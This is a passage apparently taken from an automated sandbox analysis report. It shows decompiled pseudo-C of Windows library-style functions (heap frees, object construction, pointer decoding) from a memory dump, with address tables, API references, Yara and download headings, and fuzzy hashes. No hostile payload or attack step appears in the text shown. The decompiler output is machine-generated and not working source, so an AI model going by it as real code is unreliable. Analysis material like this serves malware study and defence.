                    																							_v716 = _t396[1];
                    																							_t396 = _t451 + 8;
                    																							 *((intOrPtr*)(_t451 + 4)) = _v716;
                    																							_t357 = _v752;
                    																							_t450 = _v736;
                    																							_v728 = _t323;
                    																							_v720 = _t396;
                    																							__eflags = _t418 - 5;
                    																							if(_t418 < 5) {
                    																								continue;
                    																							} else {
                    																							}
                    																							L110:
                    																							__eflags = _t418 - 5;
                    																							if(__eflags == 0) {
                    																								_t178 = _t425 + 8; // 0x8b56ff8b
                    																								_t314 = E01409CD8(__eflags, _v712, 1, 0x1423c10, 0x7f,  &_v536,  *_t178, 1);
                    																								_t472 = _t472 + 0x1c;
                    																								__eflags = _t314;
                    																								_t315 = _v712;
                    																								if(_t314 == 0) {
                    																									_t450[1] = _t315;
                    																								} else {
                    																									do {
                    																										 *(_t458 + _t315 * 2 - 0x20c) =  *(_t458 + _t315 * 2 - 0x20c) & 0x000001ff;
                    																										_t315 = _t315 + 1;
                    																										__eflags = _t315 - 0x7f;
                    																									} while (_t315 < 0x7f);
                    																									_t318 = E013F60A6( &_v536,  *0x14353a0, 0xfe);
                    																									_t472 = _t472 + 0xc;
                    																									__eflags = _t318;
                    																									_t450[1] = 0 | _t318 == 0x00000000;
                    																								}
                    																								_t193 = _t425 + 8; // 0x8b56ff8b
                    																								 *_t450 =  *_t193;
                    																							}
                    																							 *(_t425 + 0x18) = _t450[1];
                    																							goto L121;
                    																						}
                    																						__eflags = _t418;
                    																						if(_t418 != 0) {
                    																							 *_t450 =  *(_t450 + _t418 * 8);
                    																							_t450[1] =  *(_t450 + 4 + _t418 * 8);
                    																							 *(_t450 + _t418 * 8) = _v728;
                    																							 *(_t450 + 4 + _t418 * 8) = _v716;
                    																						}
                    																						goto L110;
                    																					}
                    																					L121:
                    																					_t293 = _t357 * 0xc;
                    																					_t200 = _t293 + 0x1423b50; // 0x13c50b8
                    																					 *0x141a1a8(_t425);
                    																					_t295 =  *((intOrPtr*)( *_t200))();
                    																					_t389 = _v732;
                    																					__eflags = _t295;
                    																					if(_t295 == 0) {
                    																						__eflags = _t389 - 0x14354a0;
                    																						if(_t389 == 0x14354a0) {
                    																							L126:
                    																							_t296 = _v724;
                    																						} else {
                    																							_t449 = _t357 + _t357;
                    																							__eflags = _t449;
                    																							asm("lock xadd [eax], ecx");
                    																							if(_t449 != 0) {
                    																								goto L126;
                    																							} else {
                    																								_t218 = _t449 * 8; // 0x30ff068b
                    																								E014012E1( *((intOrPtr*)(_t425 + _t218 + 0x28)));
                    																								_t221 = _t449 * 8; // 0x30ff0c46
                    																								E014012E1( *((intOrPtr*)(_t425 + _t221 + 0x24)));
                    																								_t224 = _t357 * 4; // 0xa094
                    																								E014012E1( *((intOrPtr*)(_t425 + _t224 + 0xa0)));
                    																								_t296 = _v724;
                    																								_t392 = _v712;
                    																								 *(_t296 + _t425) = _t392;
                    																								 *(_t425 + 0xa0 + _t357 * 4) = _t392;
                    																							}
                    																						}
                    																						_t390 = _v740;
                    																						 *_t390 = 1;
                    																						_t283 =  *(_t296 + _t425);
                    																						 *((intOrPtr*)(_t425 + 0x28 + (_t357 + _t357) * 8)) = _t390;
                    																					} else {
                    																						 *((intOrPtr*)(_v724 + _t425)) = _t389;
                    																						_t205 = _t357 * 4; // 0xa094
                    																						E014012E1( *((intOrPtr*)(_t425 + _t205 + 0xa0)));
                    																						 *(_t425 + 0xa0 + _t357 * 4) = _v744;
                    																						E014012E1(_v740);
                    																						 *(_t425 + 8) = _v748;
                    																						goto L84;
                    																					}
                    																					goto L85;
                    																				}
                    																			}
                    																		} else {
                    																			_t283 = _t416;
                    																			goto L85;
                    																		}
                    																		goto L130;
                    																	}
                    																	asm("sbb eax, eax");
                    																	_t278 = _t277 | 0x00000001;
                    																	__eflags = _t278;
                    																	goto L93;
                    																} else {
                    																	L84:
                    																	_t283 = 0;
                    																	__eflags = 0;
                    																	L85:
                    																	__eflags = _v16 ^ _t458;
                    																	return E013F268B(_t283, _v16 ^ _t458);
                    																}
                    															} else {
                    																_t324 = _t440 + _t440;
                    																__eflags = _t324 - 0x106;
                    																if(_t324 >= 0x106) {
                    																	E013F37DE();
                    																	goto L82;
                    																} else {
                    																	 *((short*)(_t456 + _t324 - 0x10c)) = 0;
                    																	_t326 =  &_v276;
                    																	_push(_t326);
                    																	_push(_v460);
                    																	_push(_t421);
                    																	L83();
                    																	_t465 = _t468 + 0xc;
                    																	__eflags = _t326;
                    																	_t264 = _v452;
                    																	if(_t326 != 0) {
                    																		_t264 = _t264 + 1;
                    																		_v452 = _t264;
                    																	}
                    																	L54:
                    																	_t437 = _t352 + _t440 * 2;
                    																	_t363 = 0;
                    																	__eflags =  *_t437;
                    																	if( *_t437 == 0) {
                    																		L56:
                    																		__eflags = _t264;
                    																		L77:
                    																		if(__eflags != 0) {
                    																			goto L79;
                    																		} else {
                    																			_t249 = _t363;
                    																		}
                    																		goto L80;
                    																	} else {
                    																		_t437 = _t437 + 2;
                    																		__eflags =  *_t437;
                    																		if( *_t437 != 0) {
                    																			continue;
                    																		} else {
                    																			goto L56;
                    																		}
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t327 = 0x3b;
                    														__eflags =  *_t352 - _t327;
                    														if( *_t352 != _t327) {
                    															break;
                    														} else {
                    															goto L48;
                    														}
                    													}
                    												}
                    											}
                    											goto L130;
                    										}
                    										_t249 = 0;
                    										goto L80;
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						__eflags = _t437;
                    						if(_t437 == 0) {
                    							_t249 =  *(_t421 + (_t249 + 2 + _t249 + 2) * 8);
                    						} else {
                    							_push(_t437);
                    							_push(_t249);
                    							_push(_t421);
                    							L83();
                    						}
                    						L80:
                    						__eflags = _v12 ^ _t456;
                    						return E013F268B(_t249, _v12 ^ _t456);
                    					}
                    				}
                    				L130:
                    			}









































































































































                    0x01405366
                    0x01405369
                    0x0140536b
                    0x0140536e
                    0x0140536f
                    0x01405378
                    0x01405380
                    0x01405382
                    0x01405384
                    0x01405387
                    0x014054a0
                    0x014054a5
                    0x0140538d
                    0x0140538d
                    0x0140538e
                    0x0140538e
                    0x01405391
                    0x01405394
                    0x01405396
                    0x01405399
                    0x01405399
                    0x0140539c
                    0x0140539e
                    0x014053a1
                    0x014053a6
                    0x014053b4
                    0x014053be
                    0x014053c1
                    0x014053c4
                    0x014053c4
                    0x014053cf
                    0x014053d4
                    0x014053d9
                    0x00000000
                    0x014053df
                    0x014053e2
                    0x014053e2
                    0x014053e5
                    0x014053e7
                    0x014053ea
                    0x014053ea
                    0x014053ea
                    0x014053ec
                    0x014053ec
                    0x014053ec
                    0x014053f2
                    0x00000000
                    0x00000000
                    0x014053f7
                    0x0140540e
                    0x0140540e
                    0x014053f9
                    0x014053f9
                    0x01405401
                    0x00000000
                    0x01405403
                    0x01405403
                    0x01405406
                    0x0140540c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140540c
                    0x01405401
                    0x01405417
                    0x0140541c
                    0x0140541e
                    0x01405423
                    0x01405426
                    0x01405429
                    0x0140542c
                    0x0140542f
                    0x01405431
                    0x01405436
                    0x01405440
                    0x01405448
                    0x01405450
                    0x00000000
                    0x01405456
                    0x0140545a
                    0x014054a7
                    0x014054ad
                    0x014054b0
                    0x014054b3
                    0x014054b5
                    0x014054b9
                    0x014054bd
                    0x014054bf
                    0x014054c2
                    0x014054c7
                    0x014054bd
                    0x014054c8
                    0x014054cb
                    0x014054cd
                    0x014054cf
                    0x014054d3
                    0x014054d4
                    0x014054d6
                    0x014054d9
                    0x014054de
                    0x014054d4
                    0x014054e1
                    0x014054e4
                    0x014054e7
                    0x014054ea
                    0x014054ed
                    0x014054ed
                    0x0140545c
                    0x0140545c
                    0x0140545f
                    0x01405462
                    0x01405464
                    0x01405468
                    0x0140546c
                    0x0140546e
                    0x01405471
                    0x01405476
                    0x0140546c
                    0x01405477
                    0x0140547c
                    0x0140547e
                    0x01405483
                    0x01405485
                    0x01405488
                    0x0140548d
                    0x01405483
                    0x0140548e
                    0x01405492
                    0x01405492
                    0x01405495
                    0x01405499
                    0x0140549c
                    0x0140549c
                    0x00000000
                    0x0140549f
                    0x00000000
                    0x01405450
                    0x01405412
                    0x01405414
                    0x01405414
                    0x00000000
                    0x01405414
                    0x014054f4
                    0x014054f5
                    0x014054f6
                    0x014054f7
                    0x014054f8
                    0x014054f9
                    0x014054fe
                    0x01405501
                    0x01405502
                    0x01405504
                    0x0140550a
                    0x01405511
                    0x01405514
                    0x01405517
                    0x01405518
                    0x01405519
                    0x0140551c
                    0x0140551d
                    0x01405520
                    0x01405526
                    0x01405528
                    0x0140554d
                    0x01405557
                    0x0140555d
                    0x0140555f
                    0x01405565
                    0x01405567
                    0x014057ba
                    0x014057bb
                    0x00000000
                    0x0140556d
                    0x0140556d
                    0x01405571
                    0x014056d8
                    0x014056d8
                    0x014056ef
                    0x014056f4
                    0x014056f7
                    0x014056f9
                    0x014056ff
                    0x014056ff
                    0x01405701
                    0x01405701
                    0x01405704
                    0x01405706
                    0x0140570c
                    0x0140570c
                    0x0140570e
                    0x01405795
                    0x01405795
                    0x01405714
                    0x01405714
                    0x01405716
                    0x0140571c
                    0x0140571f
                    0x01405722
                    0x01405728
                    0x00000000
                    0x00000000
                    0x0140572a
                    0x0140572e
                    0x01405757
                    0x01405757
                    0x01405759
                    0x01405730
                    0x01405730
                    0x01405734
                    0x01405738
                    0x0140573f
                    0x01405745
                    0x00000000
                    0x01405747
                    0x01405747
                    0x0140574a
                    0x0140574d
                    0x01405755
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01405755
                    0x01405745
                    0x01405764
                    0x01405764
                    0x01405766
                    0x01405794
                    0x01405794
                    0x00000000
                    0x01405768
                    0x01405768
                    0x0140576e
                    0x0140576f
                    0x01405770
                    0x01405771
                    0x01405776
                    0x0140577c
                    0x0140577f
                    0x01405781
                    0x01405788
                    0x0140578a
                    0x0140578c
                    0x01405783
                    0x01405783
                    0x01405784
                    0x00000000
                    0x01405784
                    0x01405781
                    0x00000000
                    0x01405766
                    0x0140575d
                    0x0140575f
                    0x01405762
                    0x01405762
                    0x00000000
                    0x01405762
                    0x0140579b
                    0x0140579b
                    0x0140579c
                    0x0140579f
                    0x014057a5
                    0x014057a5
                    0x014057ae
                    0x014057b0
                    0x00000000
                    0x014057b2
                    0x014057b2
                    0x00000000
                    0x014057b2
                    0x014057b0
                    0x00000000
                    0x01405577
                    0x01405577
                    0x0140557c
                    0x00000000
                    0x01405582
                    0x01405582
                    0x01405587
                    0x00000000
                    0x0140558d
                    0x0140558d
                    0x01405593
                    0x01405598
                    0x0140559a
                    0x014055a1
                    0x014055a2
                    0x014055a4
                    0x00000000
                    0x00000000
                    0x014055aa
                    0x014055aa
                    0x014055ae
                    0x014055b4
                    0x00000000
                    0x014055ba
                    0x014055bc
                    0x014055bd
                    0x014055c0
                    0x00000000
                    0x014055c6
                    0x014055c6
                    0x014055cc
                    0x014055d1
                    0x014055db
                    0x014055df
                    0x014055e4
                    0x014055e7
                    0x014055e9
                    0x00000000
                    0x014055eb
                    0x014055eb
                    0x014055ed
                    0x014055f0
                    0x014055f0
                    0x014055f3
                    0x014055f6
                    0x014055f6
                    0x01405601
                    0x01405603
                    0x01405605
                    0x00000000
                    0x00000000
                    0x01405605
                    0x00000000
                    0x01405607
                    0x01405607
                    0x0140560d
                    0x01405610
                    0x01405610
                    0x0140561e
                    0x01405627
                    0x0140562c
                    0x01405632
                    0x01405635
                    0x01405636
                    0x01405638
                    0x01405646
                    0x01405646
                    0x0140564d
                    0x014056ae
                    0x00000000
                    0x0140564f
                    0x0140564f
                    0x0140565d
                    0x01405662
                    0x01405665
                    0x01405667
                    0x014057d7
                    0x014057d9
                    0x014057da
                    0x014057db
                    0x014057dc
                    0x014057dd
                    0x014057de
                    0x014057e3
                    0x014057e6
                    0x014057e7
                    0x014057ef
                    0x014057f6
                    0x014057f9
                    0x014057fa
                    0x014057fd
                    0x01405801
                    0x01405802
                    0x01405805
                    0x01405815
                    0x01405821
                    0x01405838
                    0x0140583d
                    0x01405840
                    0x01405842
                    0x01405857
                    0x0140585a
                    0x0140585a
                    0x0140585d
                    0x01405863
                    0x01405869
                    0x0140586c
                    0x0140586e
                    0x01405871
                    0x01405878
                    0x0140587b
                    0x01405881
                    0x00000000
                    0x00000000
                    0x01405883
                    0x01405887
                    0x014058b0
                    0x014058b0
                    0x01405889
                    0x01405889
                    0x0140588d
                    0x01405891
                    0x01405898
                    0x0140589e
                    0x00000000
                    0x014058a0
                    0x014058a0
                    0x014058a3
                    0x014058a6
                    0x014058ae
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014058ae
                    0x0140589e
                    0x014058bd
                    0x014058bd
                    0x014058bf
                    0x014058c5
                    0x014058cb
                    0x014058ce
                    0x014058ce
                    0x014058d1
                    0x014058d4
                    0x014058d4
                    0x014058e4
                    0x014058f2
                    0x014058f7
                    0x014058fe
                    0x01405900
                    0x00000000
                    0x01405906
                    0x0140590c
                    0x01405912
                    0x01405919
                    0x0140591f
                    0x01405922
                    0x01405928
                    0x01405935
                    0x0140593c
                    0x01405941
                    0x01405944
                    0x01405946
                    0x01405b9f
                    0x01405ba5
                    0x01405ba6
                    0x01405ba7
                    0x01405ba8
                    0x01405ba9
                    0x01405baa
                    0x01405baf
                    0x01405bb0
                    0x01405bb5
                    0x0140594c
                    0x0140594c
                    0x0140595a
                    0x0140595d
                    0x01405978
                    0x0140597f
                    0x01405985
                    0x0140598b
                    0x0140595f
                    0x0140595f
                    0x01405967
                    0x00000000
                    0x01405969
                    0x01405969
                    0x0140596f
                    0x0140596f
                    0x01405967
                    0x01405992
                    0x01405995
                    0x01405ab2
                    0x01405ab5
                    0x01405ac2
                    0x01405ac5
                    0x01405acd
                    0x01405acd
                    0x01405ab7
                    0x01405abd
                    0x01405abd
                    0x0140599b
                    0x0140599b
                    0x014059a1
                    0x014059a9
                    0x014059ab
                    0x014059ae
                    0x014059b7
                    0x014059c0
                    0x014059c6
                    0x014059c6
                    0x014059c9
                    0x014059cb
                    0x00000000
                    0x00000000
                    0x014059cd
                    0x014059d3
                    0x014059d4
                    0x014059df
                    0x014059e7
                    0x014059ef
                    0x014059f2
                    0x014059f5
                    0x014059fb
                    0x01405a01
                    0x01405a07
                    0x01405a0d
                    0x01405a10
                    0x00000000
                    0x00000000
                    0x01405a12
                    0x01405a37
                    0x01405a37
                    0x01405a3a
                    0x01405a3e
                    0x01405a57
                    0x01405a5c
                    0x01405a5f
                    0x01405a61
                    0x01405a67
                    0x01405aa2
                    0x01405a69
                    0x01405a69
                    0x01405a6e
                    0x01405a76
                    0x01405a77
                    0x01405a77
                    0x01405a8e
                    0x01405a95
                    0x01405a98
                    0x01405a9d
                    0x01405a9d
                    0x01405aa5
                    0x01405aa8
                    0x01405aa8
                    0x01405aad
                    0x00000000
                    0x01405aad
                    0x01405a14
                    0x01405a16
                    0x01405a1b
                    0x01405a21
                    0x01405a2a
                    0x01405a33
                    0x01405a33
                    0x00000000
                    0x01405a16
                    0x01405ad0
                    0x01405ad0
                    0x01405ad4
                    0x01405adc
                    0x01405ae2
                    0x01405ae5
                    0x01405aeb
                    0x01405aed
                    0x01405b2d
                    0x01405b33
                    0x01405b7f
                    0x01405b7f
                    0x01405b35
                    0x01405b3a
                    0x01405b3a
                    0x01405b40
                    0x01405b44
                    0x00000000
                    0x01405b46
                    0x01405b46
                    0x01405b4a
                    0x01405b4f
                    0x01405b53
                    0x01405b58
                    0x01405b5f
                    0x01405b64
                    0x01405b6d
                    0x01405b73
                    0x01405b76
                    0x01405b76
                    0x01405b44
                    0x01405b85
                    0x01405b8d
                    0x01405b93
                    0x01405b96
                    0x01405aef
                    0x01405af5
                    0x01405af8
                    0x01405aff
                    0x01405b11
                    0x01405b18
                    0x01405b25
                    0x00000000
                    0x01405b25
                    0x00000000
                    0x01405aed
                    0x01405946
                    0x014058c1
                    0x014058c1
                    0x00000000
                    0x014058c1
                    0x00000000
                    0x014058bf
                    0x014058b8
                    0x014058ba
                    0x014058ba
                    0x00000000
                    0x01405844
                    0x01405844
                    0x01405844
                    0x01405844
                    0x01405846
                    0x0140584b
                    0x01405856
                    0x01405856
                    0x0140566d
                    0x0140566d
                    0x01405670
                    0x01405675
                    0x014057d2
                    0x00000000
                    0x0140567b
                    0x0140567d
                    0x01405685
                    0x0140568b
                    0x0140568c
                    0x01405692
                    0x01405693
                    0x01405698
                    0x0140569b
                    0x0140569d
                    0x014056a3
                    0x014056a5
                    0x014056a6
                    0x014056a6
                    0x014056b4
                    0x014056b4
                    0x014056b7
                    0x014056b9
                    0x014056bc
                    0x014056ca
                    0x014056ca
                    0x014057b4
                    0x014057b4
                    0x00000000
                    0x014057b6
                    0x014057b6
                    0x014057b6
                    0x00000000
                    0x014056be
                    0x014056be
                    0x014056c1
                    0x014056c4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014056c4
                    0x014056bc
                    0x01405675
                    0x01405667
                    0x0140563a
                    0x0140563c
                    0x0140563d
                    0x01405640
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01405640
                    0x01405638
                    0x014055c0
                    0x00000000
                    0x014055b4
                    0x014056d1
                    0x00000000
                    0x014056d1
                    0x01405587
                    0x0140557c
                    0x01405571
                    0x0140552a
                    0x0140552a
                    0x0140552c
                    0x01405543
                    0x0140552e
                    0x0140552e
                    0x0140552f
                    0x01405530
                    0x01405531
                    0x01405536
                    0x014057c1
                    0x014057c6
                    0x014057d1
                    0x014057d1
                    0x01405528
                    0x00000000

                    APIs
                      • Part of subcall function 0140131B: HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    • _free.LIBCMT ref: 01405471
                    • _free.LIBCMT ref: 01405488
                    • _free.LIBCMT ref: 014054A7
                    • _free.LIBCMT ref: 014054C2
                    • _free.LIBCMT ref: 014054D9
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$AllocHeap
                    • String ID:
                    • API String ID: 1835388192-0
                    • Opcode ID: a8f91075d000b0fa9e833d97c8293dd47e73e5d098144cfbd0380e4272f0a29f
                    • Instruction ID: 57ca8dd85a768712d9bc6f5f666471f191d0a9252e0673ba1e9f0ab131a8d3b8
                    • Opcode Fuzzy Hash: a8f91075d000b0fa9e833d97c8293dd47e73e5d098144cfbd0380e4272f0a29f
                    • Instruction Fuzzy Hash: FD51A271A00305AFDB229F6BC881BAA77F4EF58721F55457EE909DB2A0E735D9018F40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E013C7B97(void* __edi) {
                    				char* _t62;
                    				void* _t66;
                    				void* _t75;
                    				intOrPtr _t87;
                    				void* _t88;
                    				void* _t94;
                    				signed char _t96;
                    				intOrPtr _t113;
                    				void* _t120;
                    				intOrPtr _t121;
                    				intOrPtr _t122;
                    				intOrPtr* _t126;
                    				void* _t127;
                    				void* _t128;
                    				void* _t129;
                    
                    				_t120 = __edi;
                    				_push(0x104);
                    				E013F26F6(E01415F6A);
                    				_t126 =  *((intOrPtr*)(_t127 + 8));
                    				 *((intOrPtr*)(_t127 - 0xa4)) = _t126;
                    				 *(_t127 - 0x98) = 0;
                    				 *((intOrPtr*)(_t126 + 0x14)) = 0xf;
                    				 *((intOrPtr*)(_t126 + 0x10)) = 0;
                    				_t133 =  *((intOrPtr*)(_t126 + 0x14)) - 0x10;
                    				 *((intOrPtr*)(_t127 - 4)) = 1;
                    				if( *((intOrPtr*)(_t126 + 0x14)) < 0x10) {
                    					_t62 = _t126;
                    				} else {
                    					_t62 =  *_t126;
                    				}
                    				 *_t62 = 0;
                    				_t96 = 1;
                    				 *(_t127 - 0x98) = 1;
                    				E013F5890(_t120, _t127 - 0x48, 0, 0x38);
                    				_t121 = E013F21A5(_t133, 0x40);
                    				_t129 = _t128 + 0x10;
                    				 *((intOrPtr*)(_t127 - 0x9c)) = _t121;
                    				 *((char*)(_t127 - 4)) = 2;
                    				_t134 = _t121;
                    				if(_t121 == 0) {
                    					_t66 = 0;
                    					__eflags = 0;
                    				} else {
                    					E013F5890(_t121, _t121, 0, 0x40);
                    					_t129 = _t129 + 0xc;
                    					_t66 = E013C2EE9(_t121, 0);
                    				}
                    				 *((char*)(_t127 - 4)) = 1;
                    				E013C33CD(_t127 - 0x48, _t121, _t134);
                    				 *((char*)(_t127 - 4)) = 3;
                    				E013F5890(_t121, _t127 - 0x94, 0, 0x4c);
                    				E013C285A(_t127 - 0x94);
                    				 *((char*)(_t127 - 4)) = 4;
                    				 *((intOrPtr*)( *((intOrPtr*)(_t127 - 0x84)) + 4))(_t127 - 0x48,  *0x1435004, 1, _t66);
                    				 *((char*)(_t127 - 4)) = 5;
                    				_t122 = E013F21A5(_t134, 0x4c);
                    				 *((intOrPtr*)(_t127 - 0xa0)) = _t122;
                    				 *((char*)(_t127 - 4)) = 6;
                    				_t135 = _t122;
                    				if(_t122 == 0) {
                    					_t75 = 0;
                    					__eflags = 0;
                    				} else {
                    					E013F5890(_t122, _t122, 0, 0x4c);
                    					_t87 = E013F21A5(_t135, 0x4c);
                    					 *((intOrPtr*)(_t127 - 0x9c)) = _t87;
                    					 *((char*)(_t127 - 4)) = 7;
                    					_t136 = _t87;
                    					if(_t87 == 0) {
                    						_t88 = 0;
                    						__eflags = 0;
                    					} else {
                    						E013F5890(_t122, _t87, 0, 0x4c);
                    						E013C2AD0(_t127 - 0xd8, 0x141a870);
                    						 *((char*)(_t127 - 4)) = 8;
                    						 *(_t127 - 0x98) = 3;
                    						E013C2AD0(_t127 - 0xc0, 0x141b8f4);
                    						_t96 = 7;
                    						 *((intOrPtr*)(_t127 - 4)) = 9;
                    						 *(_t127 - 0x98) = _t96;
                    						_t113 = E013F21A5(_t136, 0x10);
                    						 *((intOrPtr*)(_t127 - 0xa8)) = _t113;
                    						_t94 = 0;
                    						 *((intOrPtr*)(_t127 - 4)) = 0xa;
                    						_t137 = _t113;
                    						if(_t113 != 0) {
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							_t94 = E013C2833(_t113, _t126);
                    							_t122 =  *((intOrPtr*)(_t127 - 0xa0));
                    						}
                    						 *((char*)(_t127 - 4)) = 9;
                    						_t88 = E013C2F1B( *((intOrPtr*)(_t127 - 0x9c)), 1, _t137, _t94, 1, 0, _t127 - 0xc0, _t127 - 0xd8);
                    					}
                    					 *((intOrPtr*)(_t127 - 4)) = 0xc;
                    					_t75 = E013C31B6(_t122, 0x1438790, _t127 - 0x94, _t88);
                    				}
                    				_push(_t75);
                    				 *((intOrPtr*)(_t127 - 4)) = 0xe;
                    				_push(1);
                    				_push(_t127 + 0xc);
                    				E013C334E(_t127 - 0x110, 1, _t137);
                    				 *((intOrPtr*)(_t127 - 0x110)) = 0x141b050;
                    				 *((intOrPtr*)(_t127 - 0x10c)) = 0x141b120;
                    				E013E6B80(_t127 - 0x104);
                    				if((_t96 & 0x00000004) != 0) {
                    					_t96 = _t96 & 0xfffffffb;
                    					E013C6118(_t127 - 0xc0, 1, 0);
                    				}
                    				if((_t96 & 0x00000002) != 0) {
                    					E013C6118(_t127 - 0xd8, 1, 0);
                    				}
                    				E013C3D57(_t127 - 0x88);
                    				 *((intOrPtr*)(_t127 - 0x4c)) = 0x141a9ac;
                    				 *((intOrPtr*)(_t127 - 0x48)) = 0x141b050;
                    				 *((intOrPtr*)(_t127 - 0x44)) = 0x141b120;
                    				E013E6B80(_t127 - 0x3c);
                    				E013C6118(_t127 + 0xc, 1, 0);
                    				return E013F26B1(_t126);
                    			}


















                    0x013c7b97
                    0x013c7b97
                    0x013c7ba1
                    0x013c7ba6
                    0x013c7bab
                    0x013c7bb1
                    0x013c7bb9
                    0x013c7bc1
                    0x013c7bc4
                    0x013c7bc8
                    0x013c7bcb
                    0x013c7bd1
                    0x013c7bcd
                    0x013c7bcd
                    0x013c7bcd
                    0x013c7bd3
                    0x013c7bdb
                    0x013c7bde
                    0x013c7be4
                    0x013c7bf0
                    0x013c7bf2
                    0x013c7bf5
                    0x013c7bfb
                    0x013c7bff
                    0x013c7c01
                    0x013c7c1b
                    0x013c7c1b
                    0x013c7c03
                    0x013c7c08
                    0x013c7c0d
                    0x013c7c14
                    0x013c7c14
                    0x013c7c29
                    0x013c7c2d
                    0x013c7c3a
                    0x013c7c41
                    0x013c7c4f
                    0x013c7c57
                    0x013c7c68
                    0x013c7c6d
                    0x013c7c76
                    0x013c7c79
                    0x013c7c7f
                    0x013c7c83
                    0x013c7c85
                    0x013c7d6e
                    0x013c7d6e
                    0x013c7c8b
                    0x013c7c90
                    0x013c7c97
                    0x013c7c9f
                    0x013c7ca5
                    0x013c7ca9
                    0x013c7cab
                    0x013c7d4f
                    0x013c7d4f
                    0x013c7cb1
                    0x013c7cb6
                    0x013c7cc9
                    0x013c7cd9
                    0x013c7cdd
                    0x013c7ce7
                    0x013c7cee
                    0x013c7cf1
                    0x013c7cf8
                    0x013c7d04
                    0x013c7d06
                    0x013c7d0c
                    0x013c7d0e
                    0x013c7d15
                    0x013c7d17
                    0x013c7d1c
                    0x013c7d1d
                    0x013c7d1e
                    0x013c7d1f
                    0x013c7d20
                    0x013c7d25
                    0x013c7d25
                    0x013c7d31
                    0x013c7d48
                    0x013c7d48
                    0x013c7d58
                    0x013c7d67
                    0x013c7d67
                    0x013c7d70
                    0x013c7d73
                    0x013c7d7e
                    0x013c7d7f
                    0x013c7d86
                    0x013c7d91
                    0x013c7d9b
                    0x013c7da5
                    0x013c7dad
                    0x013c7db8
                    0x013c7dbb
                    0x013c7dbb
                    0x013c7dc3
                    0x013c7dce
                    0x013c7dce
                    0x013c7dd9
                    0x013c7de1
                    0x013c7de8
                    0x013c7def
                    0x013c7df6
                    0x013c7e01
                    0x013c7e0d

                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013C7BA1
                    • new.LIBCMT ref: 013C7BEB
                    • new.LIBCMT ref: 013C7C71
                    • new.LIBCMT ref: 013C7C97
                    • new.LIBCMT ref: 013C7CFE
                      • Part of subcall function 013C2F1B: __EH_prolog3.LIBCMT ref: 013C2F22
                      • Part of subcall function 013C2F1B: new.LIBCMT ref: 013C2F43
                      • Part of subcall function 013C2F1B: new.LIBCMT ref: 013C2F62
                      • Part of subcall function 013C334E: __EH_prolog3.LIBCMT ref: 013C3355
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$H_prolog3_
                    • String ID:
                    • API String ID: 4240126716-0
                    • Opcode ID: af35fea1a98221a89f8e07202686582cd07bfd0b389a3d5564973bd8aad6b90b
                    • Instruction ID: 8963606f9bab28a003357538bcb0ad3adc02373e073a71644c5e4a5dc75ef2c3
                    • Opcode Fuzzy Hash: af35fea1a98221a89f8e07202686582cd07bfd0b389a3d5564973bd8aad6b90b
                    • Instruction Fuzzy Hash: 6C6195B1900309EAFB24EB68CC45BDEBBB4AF64B08F14409DE609A72C1DBB45E44CF55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E01403DDF(signed int* __ecx, signed int __edx) {
                    				signed int _v8;
                    				intOrPtr* _v12;
                    				signed int _v16;
                    				signed int _t28;
                    				signed int _t29;
                    				intOrPtr _t33;
                    				signed int _t37;
                    				signed int _t38;
                    				signed int _t40;
                    				void* _t50;
                    				signed int _t56;
                    				intOrPtr* _t57;
                    				signed int _t68;
                    				signed int _t71;
                    				signed int _t72;
                    				signed int _t74;
                    				signed int _t75;
                    				signed int _t78;
                    				signed int _t80;
                    				signed int* _t81;
                    				signed int _t85;
                    				void* _t86;
                    
                    				_t72 = __edx;
                    				_v12 = __ecx;
                    				_t28 =  *__ecx;
                    				_t81 =  *_t28;
                    				if(_t81 != 0) {
                    					_t29 =  *0x1435234; // 0x78d9f939
                    					_t2 =  &(_t81[1]); // 0xb01848
                    					_t56 =  *_t81 ^ _t29;
                    					_t3 =  &(_t81[2]); // 0x80000003
                    					_t78 =  *_t2 ^ _t29;
                    					_t83 =  *_t3 ^ _t29;
                    					asm("ror edi, cl");
                    					asm("ror esi, cl");
                    					asm("ror ebx, cl");
                    					if(_t78 != _t83) {
                    						L14:
